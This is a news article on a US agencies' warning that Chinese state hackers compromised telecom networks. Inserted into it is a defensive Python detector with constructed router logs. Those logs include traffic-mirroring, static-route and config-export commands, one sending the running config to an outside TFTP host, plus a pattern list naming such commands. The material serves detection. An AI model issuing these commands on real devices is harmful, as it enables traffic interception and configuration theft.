Chinese hackers snooped on US telco traffic for years

China's flag overlays laptop screen
(Image credit: Shutterstock)

Chinese state-sponsored actors have been successfully compromising the networks of major US telecommunications providers for years, using the foothold gained to assault other targets in both public and private sectors. 

This stark warning was jointly issued by the National Security Agency (NSA), Cybersecurity & Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI).

According to the warning, multiple Chinese hacking groups were targeting known vulnerabilities in unpatched devices such as routers. Compromised endpoints would then be made part of a larger malicious infrastructure, leveraged to mount even more dangerous attacks. 


"Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting," the warning reads.

The threat actor would then steal login data to access SQL databases, exfiltrating administrator credentials from critical Remote Authentication Dial-In User Service (RADIUS) servers.

"Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route, capture, and exfiltrate traffic out of the network to actor-controlled infrastructure," the announcement further states.
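The activity quoted above (stolen RADIUS-backed credentials reused to log in to routers and issue commands that mirror, reroute, or export traffic and configuration) leaves a recognisable trail in device logs. The following Python script is an added detection example, not part of the article or the agencies' advisory. The log lines, the generic syslog-like format, the allowlist of admin jump hosts, and the list of sensitive command prefixes are all constructed assumptions; adapt them to the vendor formats and management hosts in your own environment.

```python
import re
from dataclasses import dataclass

# Constructed sample device logs in a generic syslog-like form (not real vendor output).
SAMPLE_LOGS = """\
2022-06-07T10:14:02Z rtr-core-01 LOGIN user=netadmin src=10.10.5.20 method=radius status=success
2022-06-07T10:14:30Z rtr-core-01 CMD user=netadmin src=10.10.5.20 cmd="show interfaces"
2022-06-07T22:41:11Z rtr-core-01 LOGIN user=netadmin src=198.51.100.77 method=radius status=success
2022-06-07T22:42:05Z rtr-core-01 CMD user=netadmin src=198.51.100.77 cmd="monitor session 1 destination interface Gi0/3"
2022-06-07T22:43:19Z rtr-core-01 CMD user=netadmin src=198.51.100.77 cmd="ip route 203.0.113.0 255.255.255.0 198.51.100.1"
2022-06-08T03:02:44Z rtr-edge-02 LOGIN user=svc-backup src=198.51.100.77 method=radius status=failure
2022-06-08T03:03:01Z rtr-edge-02 LOGIN user=svc-backup src=198.51.100.77 method=radius status=success
2022-06-08T03:05:12Z rtr-edge-02 CMD user=svc-backup src=198.51.100.77 cmd="copy running-config tftp://198.51.100.77/cfg"
"""

# Assumed allowlist: the only hosts from which interactive admin sessions are expected.
APPROVED_ADMIN_SOURCES = {"10.10.5.20", "10.10.5.21"}

# Assumed command prefixes that mirror traffic, change routing, build tunnels,
# or export the running configuration (the behaviour described in the advisory).
SENSITIVE_CMD_PATTERNS = [
    r"^monitor session",
    r"^ip route",
    r"^interface tunnel",
    r"^copy running-config",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) (?P<event>LOGIN|CMD) user=(?P<user>\S+) src=(?P<src>\S+)"
    r"(?: method=(?P<method>\S+) status=(?P<status>\S+))?(?: cmd=\"(?P<cmd>[^\"]*)\")?$"
)


@dataclass(frozen=True)
class Alert:
    ts: str
    host: str
    user: str
    src: str
    reason: str


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(lines, approved_sources=APPROVED_ADMIN_SOURCES):
    """Flag admin logins from unapproved hosts and sensitive commands issued in such sessions."""
    alerts = []
    suspicious_sessions = set()  # (host, user, src) tuples established from unapproved sources
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["host"], rec["user"], rec["src"])
        if rec["event"] == "LOGIN":
            # Only successful logins create a session worth tracking; failures are left to
            # brute-force logic elsewhere.
            if rec["status"] == "success" and rec["src"] not in approved_sources:
                suspicious_sessions.add(key)
                alerts.append(Alert(rec["ts"], rec["host"], rec["user"], rec["src"],
                                    "admin login from unapproved source host"))
        elif rec["event"] == "CMD":
            cmd = rec["cmd"] or ""
            sensitive = any(re.search(p, cmd) for p in SENSITIVE_CMD_PATTERNS)
            if sensitive and (key in suspicious_sessions or rec["src"] not in approved_sources):
                alerts.append(Alert(rec["ts"], rec["host"], rec["user"], rec["src"],
                                    f"traffic-redirecting or config-export command from unapproved session: {cmd}"))
    return alerts


def run_sample():
    """Run the detector over the constructed sample and return the alerts."""
    return analyze(SAMPLE_LOGS.splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.ts} {a.host} user={a.user} src={a.src}: {a.reason}")
```

Routine "show" commands from an approved jump host produce nothing, while the night-time RADIUS-authenticated login from an unfamiliar address followed by a mirror session, a static route, and a configuration export each raise an alert. The same two signals (who authenticated from where, and whether the session then touched routing, mirroring, or config export) are what the segmentation and monitoring controls the agencies recommend are meant to surface.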

There is a fairly long list of CVEs the threat actors were using to attack telcos, which can be found at this link. Apparently, the Chinese actors have been at it since at least 2020.

The three government agencies have urged all affected parties (companies in both the private and public sectors, in the US as well as in allied countries) to stay vigilant: apply patches as soon as they're made available, replace obsolete gear, disable unnecessary ports, and maintain a strong stack of antivirus and firewall solutions.

Segmenting networks to prevent threat actors from moving laterally is also recommended.

Via: BleepingComputer

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.